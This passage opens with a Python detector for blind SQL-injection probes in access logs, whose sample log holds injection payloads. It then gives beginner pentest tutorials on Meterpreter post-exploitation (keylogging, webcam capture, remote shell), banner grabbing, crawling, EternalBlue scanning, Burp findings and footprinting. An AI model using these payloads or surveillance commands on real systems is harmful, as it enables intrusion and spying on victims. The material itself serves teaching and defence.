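SIGNATURES = {
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "length_probe": re.compile(r"\blength\s*\(", re.I),
    "char_probe": re.compile(r"\bascii\s*\(\s*substr", re.I),
    "schema_read": re.compile(r"information_schema", re.I),
    "comment_tail": re.compile(r"--\s*\+?\s*$"),
}

# Combined-style prefix: ip ident user [time] "METHOD URL PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: one client sends the probes from this tutorial; the page
# with "you are in" is 1170 bytes and the page without it 1133 bytes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2018:10:00:01 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 1170
10.0.0.5 - - [10/Jan/2018:10:00:05 +0000] "GET /sqli/Less-8/?id=1%27%20AND%201=1%20--+ HTTP/1.1" 200 1170
10.0.0.5 - - [10/Jan/2018:10:00:07 +0000] "GET /sqli/Less-8/?id=1%27%20AND%201=0%20--+ HTTP/1.1" 200 1133
10.0.0.5 - - [10/Jan/2018:10:00:12 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(length(database()))%20=%208--+ HTTP/1.1" 200 1170
10.0.0.5 - - [10/Jan/2018:10:00:20 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20%3E%20100--+ HTTP/1.1" 200 1170
10.0.0.5 - - [10/Jan/2018:10:00:31 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(length((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)))%20%3E%205%20--+ HTTP/1.1" 200 1170
10.0.0.9 - - [10/Jan/2018:10:01:00 +0000] "GET /sqli/Less-8/?id=2 HTTP/1.1" 200 1170
10.0.0.7 - - [10/Jan/2018:10:02:00 +0000] "GET /sqli/Less-8/?id=1%27%20AND%201=1%20--+ HTTP/1.1" 200 1170
"""


def parse_line(line: str):
    """Parse one access log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["url"] = unquote_plus(rec["url"])   # %27 -> ', %20 and + -> space
    return rec


def classify(url: str) -> set:
    """Names of the signatures present in the URL's query string."""
    query = urlsplit(url).query
    return {name for name, pat in SIGNATURES.items() if pat.search(query)}


def analyse(log_text: str, threshold: int = 3) -> list:
    """Group probes by (client, path) and flag sources sending >= threshold probes.
    distinct_sizes == 2 is the tell-tale of a true/false oracle: the same page
    is served in two sizes depending on the injected condition."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["url"])
        if hits:
            probes[(rec["ip"], urlsplit(rec["url"]).path)].append((hits, rec["size"]))
    alerts = []
    for (ip, path), events in probes.items():
        if len(events) < threshold:
            continue
        kinds = set().union(*(h for h, _ in events))
        alerts.append({
            "ip": ip, "path": path, "probes": len(events),
            "kinds": sorted(kinds),
            "distinct_sizes": len({size for _, size in events}),
        })
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```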






Beginner Guide to Meterpreter (Part 1)

Metasploit is a security project, or we can say a framework, provided to us in order to run exploit code on the target's PC.

Metasploit currently includes more than 1600 exploits. It has more than 420 payloads right now, which include the command shell, Meterpreter etc.

Meterpreter is generated only when the session is created. It helps in gaining full access to the target machine.

Once Meterpreter is generated we have full access to the target machine. Meterpreter includes more than 300 commands which can help us in exploiting the target machine. The help command is the most basic Meterpreter command, which lists all the commands that can be performed on the target machine.
Some of the meterpreter commands are given below:

Sysinfo

This command provides the system information of the victim. It gives us every detail of the victim's PC, such as the architecture, the operating system on the target machine, how many users are logged in to that machine, and the system's language.


getuid
This command shows the user that the Meterpreter server is running as on the remote PC.


getprivs
This command lists the privileges enabled for the current process on the remote PC. If only a few privileges are enabled, the current user is not an administrator.


pwd
pwd stands for print working directory. It shows the current working directory on the remote PC.
The image above shows that the current directory is Downloads.
ps
ps stands for processes. It lists all the running processes on the remote PC.



The image above lists every running process on the victim's PC along with its process id.
Keylogger
Keylogging uses 3 basic commands:

keyscan_start
This command starts capturing the keyboard activity on the remote PC.

keyscan_dump
This command dumps the captured keyboard activity of the remote PC, i.e. it displays the keystrokes typed so far on our screen.

keyscan_stop
This command stops capturing the keyboard activity on the remote PC.



As the image above shows, the input typed by the victim is visible to us.
show_mount
This command lists all the drives on the remote PC. The drives with their total size and free space on the target's PC are displayed below.

screenshot
This command captures a screenshot of the remote PC's desktop and saves it on our PC. The path where the screenshot is saved is printed, as shown in the image below.


upload

This command uploads a file to the victim's PC.
The syntax is upload <local file> <remote destination>: give the path of the local file with its name and extension, followed by the directory on the remote PC where it should be placed.


download

This command downloads a file from the victim's PC.
The syntax is download <remote file> <local destination>: first give the remote path with the file name and extension, then the local path where the downloaded file should be saved.


shell

The shell command drops us into a command prompt on the remote PC. From there any cmd command can be run on the victim's PC.


getsid
Here sid stands for security identifier. This command shows the SID of the user the Meterpreter server is running as.


ipconfig
This command shows the network interfaces of the remote PC with their IP addresses and MAC addresses.

background

This command sends the current Meterpreter session to the background and returns to the msf prompt. Type sessions to list the active sessions; to return to one of them type sessions -i followed by its session id, and we are back in that machine's session.


migrate
This command moves the Meterpreter session from the process it is currently running in to another process, identified by its process id (PID). Migrating into a stable, long-lived process keeps the session alive if the originally exploited process exits.

As you can see in the image above we have moved the session from PID 3872 to PID 2224.

reboot
This command reboots the remote PC.

webcam_snap
This command takes a picture with the remote PC's webcam and saves it on our PC.


As you can see, the image above is the picture taken through the remote PC's webcam.

getpid

This command shows the process id of the process Meterpreter is currently running in. On the target machine it is process id 9040, as displayed in the image below.


localtime

This command shows the date, time and time zone of the remote PC.


checksum

This command computes the hash of a file on the remote PC. The syntax is checksum md5 <file> or checksum sha1 <file>: the hash algorithm comes first, then the file name with its extension. A hash is a value derived from the content of a file and used to verify its integrity: any modification to the file changes the hash, even if only a single character is changed.

The image above shows the hash of the file kJMKzE.


Thank You for reading this article.  We will be discussing about more meterpreter commands in the next article.

5 ways to Banner Grabbing

A banner is the text message a host sends when a client connects to one of its services. Banners usually contain information about the service, such as the product name and version number.
Banner grabbing is the process of collecting details about a remote PC on the network and the services running on its open ports. An attacker uses banner grabbing to discover hosts, the services and versions listening on their open ports, and often the operating system, so that known vulnerabilities in those versions can be exploited.


Nmap
The banner NSE script is a simple banner grabber: it connects to an open TCP port and prints out whatever the listening service sends within five seconds.
The banner is shortened to fit on a single line, but an extra line may be printed for every increase in the verbosity level requested on the command line.

Type the following command to fetch the banner of every open port on the remote PC.
nmap -sV --script=banner 192.168.1.106

From the screenshot you can read the services and their versions on the open ports, fetched by the Nmap banner script for the target 192.168.1.106.


The following command grabs the banner of a selected port only, here port 80 (HTTP), together with the service version.
nmap -Pn -p 80 -sV --script=banner 192.168.1.106
The result includes the line "http-server-header: Apache/2.2.8 (Ubuntu) DAV/2".


CURL
curl -I sends a HEAD request, so only the response headers are returned; type the following command to grab the HTTP banner of the remote PC.
curl -s -I 192.168.1.106 | grep -e "Server: "
As result it prints "Server: Apache/2.2.8 (Ubuntu) DAV/2".


TELNET
Type the following command to grab the SSH banner of the remote PC.
telnet 192.168.1.106 22
As result it prints "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1".

NETCAT
Type the following command to grab the SSH banner of the remote PC.
nc -v 192.168.1.106 22
As result it prints "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1".

DMITRY
DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux command line application written in C. DMitry gathers as much information as possible about a host. Its base functionality can gather possible subdomains, email addresses, uptime information, perform a TCP port scan, whois lookups, and more.

dmitry -b grabs the banners of all open ports; type the following command to grab the banners of the remote PC.

dmitry -b 192.168.1.106
From the screenshot you can see it has shown the banners of the open ports 21, 22, 23 and 25.
In this way an attacker can learn the services and their versions on the open ports of a remote PC.
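All five tools above do the same two things: open a TCP connection and read what the service sends, poking it first when it stays silent (HTTP only answers after a request, which is why curl -I works where telnet shows nothing). The following added example (written for this page, not taken from the article or from any of the tools) does this in Python and reduces the raw banner to the version string a tester cares about. The loopback listeners are constructed stand-ins for the SSH and HTTP services of 192.168.1.106 so that the script runs offline; the banners they send are copied from the article's output.

```python
import socket
import threading

# HTTP does not speak first, so a request must be sent to draw out the Server
# header; SSH, FTP and SMTP send their banner as soon as the connection opens.
HTTP_HEAD = b"HEAD / HTTP/1.0\r\nHost: target\r\n\r\n"


def grab_banner(host, port, probe=None, timeout=5.0):
    """Connect to host:port, send an optional probe, return the first bytes as text.

    Returns None when the port is closed, filtered or silent for `timeout` seconds.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            if probe:
                sock.sendall(probe)
            data = sock.recv(1024)
    except OSError:          # connection refused, unreachable, or timed out
        return None
    return data.decode("utf-8", errors="replace").strip()


def service_version(banner):
    """Reduce a raw banner to the software/version string a tester cares about."""
    if not banner:
        return None
    lines = banner.splitlines()
    for line in lines:                       # HTTP: the Server response header
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    first = lines[0]
    if first.startswith("SSH-") and first.count("-") >= 2:
        return first.split("-", 2)[2]        # SSH-2.0-<software> -> <software>
    return first                             # FTP/SMTP greetings: take the line as-is


def fake_service(banner, waits_for_request=False):
    """Constructed loopback listener standing in for the remote host; returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            if waits_for_request:
                conn.recv(1024)              # behave like a web server: wait for the request
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    ssh_port = fake_service(b"SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n")
    http_port = fake_service(
        b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Ubuntu) DAV/2\r\n\r\n", True)
    print("ssh :", service_version(grab_banner("127.0.0.1", ssh_port)))
    print("http:", service_version(grab_banner("127.0.0.1", http_port, probe=HTTP_HEAD)))
```

Against a real host, call grab_banner() with the target address and port, passing probe=HTTP_HEAD for web ports; a None result distinguishes a closed or filtered port from a service that simply has no banner.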

5 Ways to Crawl a Website


A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing .

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit.  If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern day database.

Let’s Begin!!
Metasploit
This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts www.tptl.in
msf auxiliary(msfcrawler) > exploit



From the screenshot you can see that the crawler has extracted the files of the website, for example about.php, the jquery contact form, html pages and so on, which would be tedious to discover manually by browsing the site. It can be used for information gathering on any website.


HTTRACK
HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche.
It allows you to download a World Wide Web site from the Internet to a local directory, building all directories recursively and getting HTML, images, and other files from the server to your computer. HTTrack preserves the original site's relative link structure.

Type the following command in the terminal
httrack http://tptl.in -O /root/Desktop/file

It saves the output inside the given directory /root/Desktop/file


From the given screenshot you can observe that it has dumped the website's contents there, consisting of html files as well as JavaScript and jquery.


BLACK WIDOW
This Web spider utility detects and displays detailed information about a user-selected Web page, and it offers other Web page tools.
BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter the URL of your choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter the URL http://tptl.in in the Address field and press Go.


Click on the Start button on the left to begin URL scanning and select a folder to save the output.
From the screenshot you can observe that I browsed to C:\Users\RAJ\Desktop\tptl in order to store the output there.


When you open the target folder tptl you get the entire data of the website: images, content, html files, php files and JavaScript are all saved in it.


WEBSITE RIPPER COPIER

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads

You can download it from here.

Choose the “web sites for offline browsing” option.


Enter the website URL as http://tptl.in and click on Next.


Mention the directory path to save the output and click Run Now.

When you open the selected folder tp you will find the fetched css, php, html and js files inside it.


BURP SUITE SPIDER
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
For more detail read our previous article from here.
From the given screenshot you can observe that I have captured the HTTP request to http://tptl.in; now send it to Spider with the help of the Action tab.


The targeted website has been added to the site map under the Target tab as a new scope for web crawling. From the screenshot you can see it started crawling the target website and collected the website's content in the form of php, html and js files.
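Every crawler in this article works the same way: start from a seed URL, pull the links out of each page, stay on the target host (Burp's "scope"), and keep going until nothing new turns up. The following added example (written for this page, not taken from the article or from any of the tools above) implements that loop in Python with the standard library. The SITE dictionary is a constructed miniature of tptl.in so the crawl runs offline; it is not the real site's content. It shows two details the tools handle for you: fragments (#form) are stripped so the same page is not fetched twice, and mailto: and off-site links are discovered but not followed.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlparse


class LinkExtractor(HTMLParser):
    """Collect the attributes a spider follows: links, scripts, styles, images, forms."""
    LINK_ATTRS = {"a": "href", "link": "href", "script": "src",
                  "img": "src", "iframe": "src", "form": "action"}

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        wanted = self.LINK_ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value:
                self.found.append(value)


def extract_links(page_url, html):
    """Absolute, fragment-free http(s) URLs referenced by a page."""
    parser = LinkExtractor()
    parser.feed(html)
    links = set()
    for raw in parser.found:
        absolute, _fragment = urldefrag(urljoin(page_url, raw))
        if urlparse(absolute).scheme in ("http", "https"):   # drops mailto:, javascript:
            links.add(absolute)
    return links


def in_scope(url, seed):
    """Stay on the target host; following off-site links is how a crawl escapes scope."""
    return urlparse(url).netloc == urlparse(seed).netloc


def crawl(seed, fetch, max_pages=100):
    """Breadth-first crawl from `seed`; fetch(url) returns HTML text or None."""
    seen, queue, visited = {seed}, deque([seed]), []
    while queue and len(visited) < max_pages:
        url = queue.popleft()
        visited.append(url)
        html = fetch(url)
        if not html:
            continue                       # non-HTML resource or fetch failure
        for link in extract_links(url, html):
            if link not in seen and in_scope(link, seed):
                seen.add(link)
                queue.append(link)
    return visited


# Constructed miniature of the tptl.in site used in the article (not its real content).
SITE = {
    "http://tptl.in/": (
        '<html><head><link rel="stylesheet" href="/css/main.css">'
        '<script src="js/jquery.js"></script></head><body>'
        '<a href="about.php">About</a> <a href="/contact.php#form">Contact</a>'
        '<a href="mailto:info@tptl.in">Mail</a> <a href="http://other.example/x">Partner</a>'
        '</body></html>'),
    "http://tptl.in/about.php": '<a href="/">Home</a><img src="/img/logo.png">',
    "http://tptl.in/contact.php": '<form action="send.php" method="post"></form>',
}


def fake_fetch(url):
    """Stands in for an HTTP GET; returns None for anything not in the constructed site."""
    return SITE.get(url)


if __name__ == "__main__":
    for url in crawl("http://tptl.in/", fake_fetch):
        print(url)
```

To crawl a live site, replace fake_fetch with a function that performs the GET (and returns None for non-HTML content types), and keep max_pages: an unbounded crawl of a large application is the quickest way to upset its owner.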


3 ways to scan Eternal Blue Vulnerability in Remote PC

Hello Friends! As we all know, Microsoft Windows 7 machines running SMBv1 are exploitable by EternalBlue. Microsoft patched this vulnerability (MS17-010), but there is still a large number of Windows 7 users who have not updated their systems. If a security tester wants to separate vulnerable systems from patched ones, he needs a scan that identifies the vulnerable systems.

Eternal scanner is a network scanner for the EternalBlue exploit, CVE-2017-0144.

Target: Windows 7
Attacker: Kali Linux

Open the terminal in your Kali Linux and type the following command to download it from GitHub.


git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner


Once it is downloaded, run the script to launch the scanner in the terminal by typing:
./escan

Once the scanner is launched it asks for a target IP; you can also give a range of IPs to scan.

We have given a single IP as target, i.e. 192.168.1.106.

It then starts scanning and lists the IPs in the given range that are vulnerable; from the screenshot you can observe it reported 192.168.1.106:445 as vulnerable (SMB port 445) and saved the output in /root/eternal_scanner/vulnr.txt


When you open the output file you see the vulnerable IP as well as the name of the exploit, "MS17-010", as shown in the image.
Similarly you can scan the target using Nmap and Metasploit.


NMAP

The smb-vuln-ms17-010 script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (MS17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the IPC$ tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against MS17-010. Additionally it checks for known error codes returned by patched systems.
Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

The following command scans for SMB vulnerabilities using the built-in vuln scripts and reports according to the results.
nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from the screenshot that port 445 is open and vulnerable: the target is exploitable via MS17-010, and the risk factor is HIGH.


We can scan directly for MS17-010 with the dedicated NSE script using the following command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From the screenshot you can observe that it scanned only for MS17-010 and found the target vulnerable.

From both Nmap results we conclude that the target is vulnerable because of Microsoft SMBv1.


METASPLOIT
Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

From the screenshot you can perceive that the host is vulnerable to MS17-010.
Great!!! Now use MS17-010 to exploit your target.
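When the Nmap check above is run against a whole range, it is easier to triage the results from the XML written by -oX than from the screen. The following is an added example (not from the article, Nmap or Metasploit) that lists the hosts whose smb-vuln-ms17-010 result reports State: VULNERABLE. The XML fragment is constructed for the example and follows the layout of Nmap's XML output as this example assumes it (a host element with an address element, and the script result as a script element whose output attribute and elem key="state" child carry the state); check the element names against a real -oX file before relying on it.

```python
import xml.etree.ElementTree as ET

SCRIPT_ID = "smb-vuln-ms17-010"


def ms17_010_results(nmap_xml):
    """Map each IPv4 address to the state reported by smb-vuln-ms17-010 (if any)."""
    results = {}
    root = ET.fromstring(nmap_xml)
    for host in root.iter("host"):
        addr = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != SCRIPT_ID:
                continue
            state = None
            for elem in script.iter("elem"):          # structured form of the result
                if elem.get("key") == "state":
                    state = (elem.text or "").strip()
            if not state:                             # fall back to the text form
                for line in script.get("output", "").splitlines():
                    if line.strip().startswith("State:"):
                        state = line.split(":", 1)[1].strip()
            results[addr] = state or "no result"
    return results


def vulnerable_hosts(nmap_xml):
    """Addresses whose state begins with VULNERABLE, sorted for a report."""
    return sorted(ip for ip, state in ms17_010_results(nmap_xml).items()
                  if state.upper().startswith("VULNERABLE"))


# Constructed sample modelled on `nmap -p445 --script smb-vuln-ms17-010 -oX out.xml`:
# one unpatched host, one where the script could not run, one with 445 closed.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.1.106" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE&#10;    IDs:  CVE:CVE-2017-0143&#10;    Risk factor: HIGH">
        <table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table>
      </script>
    </port></ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.107" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms17-010" output="ERROR: Script execution failed (use -d to debug)"/>
    </port></ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.108" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="closed"/></port></ports>
  </host>
</nmaprun>
"""

if __name__ == "__main__":
    for ip, state in ms17_010_results(SAMPLE_XML).items():
        print(ip, state)
    print("exploitable:", vulnerable_hosts(SAMPLE_XML))
```

Hosts that come back as "no result" (the script ran but reported no state, as for 192.168.1.107 above) deserve a second look rather than being treated as patched.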

Vulnerability Analysis in Web Application using Burp Scanner

Hello friends! Today we are going to use Burp Suite Scanner, which is used for website security testing to identify vulnerabilities. It is the first phase of web penetration testing for every security tester.

Burp Scanner is a tool for automatically finding security vulnerabilities in web applications. It is designed to be used by security testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Target: http://testphp.vulnweb.com
Let's start with Burp Proxy in order to intercept the requests between the browser and the website. From the screenshot you can see that we have sent the intercepted request for an active scan.


Note: Always configure your browser proxy while making use of burp suite to intercept the request.


Through a window alert it will ask to confirm your action for active scan; press YES to begin the active scan on targeted website.


Issue Activity
The issue activity tab contains a sequential record of the Scanner's activity in finding new issues and updating existing ones. Each entry shows:

·         An index number for the item, reflecting the order in which items were added.
·         The time that the activity occurred.
·         The action that was performed.
·         The issue type.
·         The host and URL path for the issue.
·         The insertion point for the issue, where applicable.
·         The severity and confidence of the issue.

From the screenshot you can observe that the scan highlighted 8 types of issues found in the website:
1.       Cross-site scripting (reflected)
2.       Flash cross-domain policy
3.       SQL injection
4.       Unencrypted communications
5.       Cross-domain Referer leakage
6.       Email addresses disclosed
7.       Frameable response (potential Clickjacking)
8.       Path-relative style sheet import


Active Scan Queue

Active scanning typically involves sending large numbers of requests to the server for each base request that is scanned, and this can be a time consuming process. When you send requests for active scanning, these are added to the active scan queue, in which they are processed in turn.

·         An index number for the item, reflecting the order in which items were added.
·         The destination protocol, host and URL.
·         The current status of the item, including percentage complete.
·         The number of scan issues identified for the item.
·         The number of requests made while scanning the item.
·         The number of network errors encountered.
·         The number of insertion points created for the item.
·         The start and end times of the item's scanning.

One by one we are going to look at these vulnerabilities in detail using the request and response.


Advisory on Cross-site scripting (reflected)

The advisory gives a brief description of the vulnerability and an idea of how to exploit it.
Issue:  
Cross-site scripting (reflected)
Severity:  
High
Confidence:  
Certain
Host:  
http://testphp.vulnweb.com
Path:  
/listproducts.php

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload was submitted in the cat parameter. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

In the request tab we see the payload the scanner injected into the intercepted request in order to observe the response. In the given image you can observe that it has injected JavaScript into the URL's cat parameter.

In the response the injected payload is echoed back unencoded in the HTML (it is reflected from the request, not stored in a database). When a browser renders this response the script runs and an alert prompt appears on screen.


Let's verify it manually on the live website.
Execute the following script in the URL's cat parameter; as a result you will receive an alert window showing 1.

 Advisory on SQL injection
Similarly, test the other vulnerabilities.
Issue:  
SQL injection
Severity:  
High
Confidence:  
Firm
Host:  
http://testphp.vulnweb.com
Path:  
/listproducts.php

The cat parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cat parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether vulnerability is present.

The database appears to be MySQL.

Under the request tab a single quote (') is passed in the cat parameter to break the SQL statement, so that a database error comes back in the response.

Under the response tab the highlighted text is the MySQL error message, which clearly points to the SQL injection vulnerability.

 Advisory on Flash cross-domain policy

Issue:  
Flash cross-domain policy
Severity:  
High
Confidence:  
Certain
Host:  
http://testphp.vulnweb.com
Path:  
/crossdomain.xml

The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.



As above, the scanner requested crossdomain.xml with a GET request.

The GET request received a successful response; in the highlighted text you can read that the policy allows access to this site from any domain on any port, and that secure is set to false.
In this way we can see how Burp Scanner tests for security loopholes in a website.
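The crossdomain.xml finding is simple enough to check without Burp: fetch the file and look at the allow-access-from rules. The following added example (written for this page, not part of the article or of Burp) audits a policy document for the settings Burp flagged above, a wildcard domain and secure="false", plus two related ones. Both policy documents are constructed for the example; the weak one is shaped like the response described above, not copied from it.

```python
import xml.etree.ElementTree as ET


def audit_crossdomain_policy(xml_text):
    """Return human-readable findings for a Flash/Silverlight crossdomain.xml.

    The dangerous settings are the ones Burp flagged above: a wildcard domain
    (any site can read authenticated responses through a Flash object) and
    secure="false" (a policy served over https also trusts plain-http origins).
    """
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": every origin may read responses')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": all subdomains trusted')
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'allow-access-from domain="{domain}" secure="false": '
                            'http origins trusted by an https policy')
        if rule.get("to-ports") == "*":
            findings.append(f'allow-access-from domain="{domain}" to-ports="*": all ports exposed')
    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" and hdr.get("headers") == "*":
            findings.append('allow-http-request-headers-from domain="*" headers="*": '
                            'any site may send arbitrary headers')
    return findings


# Constructed policies: the first is shaped like the one Burp reported, the second is hardened.
WEAK_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" to-ports="*" secure="false"/>
</cross-domain-policy>"""

HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for finding in audit_crossdomain_policy(WEAK_POLICY):
        print("[!]", finding)
    print("hardened findings:", audit_crossdomain_policy(HARDENED_POLICY))
```

In practice the input is the body of GET /crossdomain.xml; an empty findings list for a site that needs no cross-domain access at all is still worth a note, since the fix there is to remove the file entirely.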



Beginner Guide to Footprinting

There are many sayings about knowing your enemy, and time and again they have proved true. Today we hear all around about the work of hackers, and many a time we fail to protect ourselves because we are not familiar with their working process. Therefore, in this article we make you accustomed to the first step of that process, i.e. Footprinting.

In the world of Cyber Security, Footprinting is the first step, in which penetration testers gather information about the target's hardware and network. It is basically an exploration process which helps us to know our enemy. In order to complete the penetration process, one ought to gather as much information as possible. Footprinting can be done either actively or passively. Reviewing a company's public website is an illustration of passive footprinting, and trying to obtain sensitive information through social engineering is an illustration of active footprinting.

Types of Footprinting:

·         Footprinting through Search Engine
·         Footprinting through social engineering
·         Footprinting through Social Networking sites
·         Website Footprinting
·         Competitive Intelligence
·         WHOIS Footprinting
·         Footprinting using advanced Google hacking techniques
·         Email Footprinting
·         DNS Footprinting
·         Network Footprinting

As this is the first part of our footprinting series, we will discuss the first three types of footprinting.

Footprinting through Search Engine

Footprinting through search engines is unambiguous in itself. People often wonder what one can find through a search engine, as the common idea of a search engine is basic exploring. But the results a search engine returns can be used to the hacker's advantage, as they are vast in nature.

Attackers use search to gather information about their target such as technology platforms, employee details, login pages, intranet portals, etc., which helps in performing social engineering and/or other types of advanced system attacks.

Even search engine caches and internet archives may provide sensitive information that has since been removed from the World Wide Web (WWW).

There are many search engines where you can find anything you desire, from the meaning of a word to a person. Such search engines are:



Now let's take the example of google.com. If I search "Raj Chandel" in Google, it gives me every possible result associated with the said person.


Other search engines return similar results, but each has its strengths. As shown above, Google is good for general information. If you want to know which websites are hosted on a particular server, you can use the Bing search engine and its ip: operator. To find the IP address of a website, just ping the website as shown below.


Now open bing.com, type ip: followed by that IP address in the search bar and press enter.


In this way Bing gives you details of the websites hosted on the same server.


Another search engine is shodan.io; it helps to locate open ports, vulnerable IPs and affected devices all over the world. Open shodan.io in your browser and search for a port or IP.


For a detailed tutorial of shodan.io please follow this link:

http://www.hackingarticles.in/shodan-search-engine-hackers-beginner-tutorial/


Footprinting through jobs seeking sites

Similarly, you can collect an abundance of information through job sites: a company's infrastructure details, employee profiles, and the hardware and software it uses, since job postings often name the exact products the team works with. Some such sites are:


Footprinting through Alerts

There is also a feature for adding alerts. Once you have added an alert for a website, it notifies you whenever something on that website changes. To do so, open google.com/alerts, type the name of the website you want to be alerted about, and then click on Create Alert.


And this way an alert will be created.



Footprinting through Social Networking sites

Attackers use social networking sites like Facebook, Twitter, Pinterest etc. to gain important and sensitive data about their target. They often create fake profiles on these sites to lure their target and extract sensitive information.

Employees may post personal information such as date of birth, educational and employment background, spouse's name, etc., and information about their company such as potential clients and business partners, trade secrets, websites, upcoming news, mergers, acquisitions, etc.
Even an employee's interests are tracked, and they are then tricked into revealing more information.

